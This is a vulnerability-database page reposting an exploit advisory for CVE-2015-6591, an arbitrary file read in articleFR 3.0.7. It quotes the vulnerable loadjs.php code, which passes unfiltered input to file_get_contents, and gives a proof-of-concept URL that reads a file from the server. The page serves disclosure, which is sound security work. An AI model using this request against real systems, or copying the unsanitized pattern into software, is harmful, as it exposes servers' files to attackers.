Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2015-6591

Publish Date: 26 Oct 2015

Source

                							

                # Exploit Title: articleFR any file read vulnerability in v3.0.7
# Date: 2015-09-06
# Vendor: Free Reprintables
# Exploit Author: cfreer &amp; 0keeTeam
# Product web page: http://www.freereprintables.com
# Version: 3.0.7
# CVE : CVE-2015-6591


Details of the vulnerability are as follows:

Affected version: Version 3.0.7 and before.
Discover date:2015/9/6
Tested on: Apache/2.4.7 (Win32)
===================================================

The vulnerable parameter is ‘s’ ( in
articleFR\application\templates\amelia\loadjs.php). Finally, Parameter ‘s’
was directly into the function of file_get_contents.

&lt;?
header('Content-Type: application/javascript');
$_content = file_get_contents($_GET['s']);
$_content = preg_replace('/(' . $_GET['h'] . ')/sim', $_GET['r'],
$_content);
print $_content;
exit;
?&gt;



Proof of Concept:
=================================================================================================

http://127.0.0.1/articleFR/application/templates/amelia/loadjs.php?h=cfreer&amp;r=0keeTeam&amp;s=loadjs.php

=================================================================================================


referer: https://github.com/poc-lab/exp/blob/master/CVE-2015-6591
<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

articleFR 3.0.7 Arbitrary File Read

Vulmon Search

About

Products

Connect